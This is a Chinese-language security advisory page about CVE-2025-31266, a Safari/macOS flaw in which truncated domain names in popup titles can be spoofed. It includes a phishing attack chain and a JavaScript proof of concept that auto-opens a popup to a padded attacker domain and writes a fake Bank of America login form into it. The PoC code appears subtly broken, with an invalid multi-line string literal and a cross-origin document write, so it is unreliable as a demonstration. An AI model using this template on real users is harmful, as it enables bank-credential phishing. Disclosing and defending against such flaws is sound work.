CVE-2025-31266 Safari macOS域名欺骗漏洞

漏洞信息

漏洞编号

CVE-2025-31266

漏洞类型

URL欺骗/域名欺骗

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Safari, macOS Sequoia

漏洞概述

CVE-2025-31266是Apple产品中一个中等严重程度的域名欺骗漏洞。该漏洞存在于Safari浏览器和macOS Sequoia操作系统中，攻击者可以利用域名显示时的截断处理缺陷，在弹出窗口标题栏中伪造可信的域名信息。具体而言，当浏览器显示完全限定域名（FQDN）时，由于截断逻辑存在问题，攻击者可以构造特殊的域名使得显示的域名与实际域名不符，从而诱导用户相信该网站来自合法的来源。攻击者通常会创建一个看似属于银行、政府机构或知名企业的钓鱼网站弹窗，利用用户对域名显示的信任心理，窃取敏感信息如登录凭证、信用卡数据或个人身份信息。由于该漏洞需要用户交互才能触发（CVSS用户交互评分为R），攻击者需要诱导用户打开恶意链接或访问特制网页。此漏洞由Apple产品安全团队（[email protected]）发现并报告，已在Safari 18.5和macOS Sequoia 15.5版本中得到修复。

技术细节

该域名欺骗漏洞的根本原因在于Safari浏览器在显示弹出窗口标题时对完全限定域名（FQDN）的截断处理逻辑存在缺陷。当浏览器需要在一个受限空间内显示完整域名时，不当的截断算法可能导致域名显示异常，使得攻击者能够利用视觉欺骗技术伪造可信域名。攻击者可以通过注册包含特殊字符或长字符串的域名，利用子域名填充和URL编码等技术，使得截断后的显示名称与实际恶意域名不符。例如，攻击者可能注册类似“legitimate-bank.evil-domain.com”的域名，在域名截断后只显示“legitimate-bank.com”的效果，从而欺骗用户。该漏洞的攻击场景通常涉及钓鱼攻击，攻击者创建包含恶意弹窗的网页，当用户访问时会弹出看起来属于可信机构的窗口。由于macOS的沙箱安全机制和该漏洞需要用户交互的特性，直接的远程代码执行风险较低，但结合社会工程学攻击可造成严重的敏感信息泄露风险。攻击者还可能结合其他漏洞或诱导用户下载恶意内容来扩大攻击面。

攻击链分析

STEP 1

步骤1

攻击者注册包含特殊构造字符串的恶意域名，利用子域名填充技术使截断后的显示名称与真实恶意域名不符

STEP 2

步骤2

攻击者创建包含恶意JavaScript代码的网页，该代码会调用window.open()打开指向恶意域名的弹出窗口

STEP 3

步骤3

通过社会工程学手段诱导目标用户访问恶意网页，如发送钓鱼邮件、即时消息或植入恶意广告

STEP 4

步骤4

用户访问页面后，恶意脚本自动或通过用户点击触发弹出窗口，由于Safari域名截断缺陷，窗口标题显示伪造的合法域名

STEP 5

步骤5

用户基于欺骗性的域名显示，误认为弹窗来自可信机构，在伪造的登录界面输入敏感凭证

STEP 6

步骤6

攻击者捕获用户输入的敏感信息，完成凭证窃取攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-31266 PoC - Domain Name Spoofing via Popup Window
// This PoC demonstrates how an attacker can spoof domain names in popup window titles

// Attacker's controlled domain that will appear legitimate after truncation
const ATTACKER_DOMAIN = 'legitimate-bank.' + 'a'.repeat(100) + '.malicious.com';

// Create a malicious page that displays a spoofed popup
const maliciousPage = `
<!DOCTYPE html>
<html>
<head>
    <title>Secure Banking Portal</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; }
        .spoofed-popup { 
            border: 2px solid #0066cc; 
            padding: 20px; 
            background: #f0f8ff;
            max-width: 400px;
        }
    </style>
</head>
<body>
    <h2>Security Alert</h2>
    <div class="spoofed-popup">
        <p>Your session has expired. Please re-authenticate.</p>
        <button onclick="openSpoofedWindow()">Continue to Login</button>
    </div>

    <script>
        function openSpoofedWindow() {
            // Open window with attacker-controlled domain
            // The truncation in Safari may show only the legitimate-looking part
            const fakeWindow = window.open(
                'https://' + '${ATTACKER_DOMAIN}',
                'Login Window',
                'width=500,height=400,menubar=no,toolbar=no'
            );
            
            // Inject content into the popup to appear as legitimate bank
            if (fakeWindow) {
                fakeWindow.document.write('
                    <html>
                    <head><title>Secure Login - Bank of America</title></head>
                    <body style="font-family:Arial;text-align:center;padding:50px;">
                        <h2>Bank of America - Sign In</h2>
                        <form>
                            <input type="text" placeholder="User ID" style="padding:10px;margin:10px;"><br>
                            <input type="password" placeholder="Password" style="padding:10px;margin:10px;"><br>
                            <button type="submit" style="padding:10px 20px;">Sign In</button>
                        </form>
                    </body>
                    </html>
                ');
            }
        }
        
        // Auto-trigger on page load for demonstration
        // In real attack, this would be triggered via social engineering
        window.onload = function() {
            setTimeout(openSpoofedWindow, 1000);
        };
    </script>
</body>
</html>
`;

console.log('CVE-2025-31266 Domain Spoofing PoC');
console.log('Target: Safari < 18.5, macOS Sequoia < 15.5');
console.log('Attack Vector: Manipulate FQDN truncation for visual spoofing');
console.log('\nTo test this vulnerability:');
console.log('1. Host this page on a web server');
console.log('2. Access it via vulnerable Safari version');
console.log('3. Observe the spoofed domain in popup title');

影响范围

Safari < 18.5

macOS Sequoia < 15.5

防御指南

临时缓解措施

立即将Safari浏览器升级至18.5或更高版本，将macOS系统升级至Sequoia 15.5或更高版本。在完成补丁更新前，用户应提高安全意识，不要轻信弹出窗口中显示的域名信息，在输入任何敏感信息前务必检查浏览器地址栏的实际URL。同时建议启用双因素认证以增加账户安全性，对于可疑网站直接关闭不要与其进行任何交互。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-31266
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-31266
3 Details https://www.cvedetails.com/cve/CVE-2025-31266/
4 VulDB https://vuldb.com/cve/CVE-2025-31266
5 Link https://support.apple.com/en-us/122716
6 Link https://support.apple.com/en-us/122719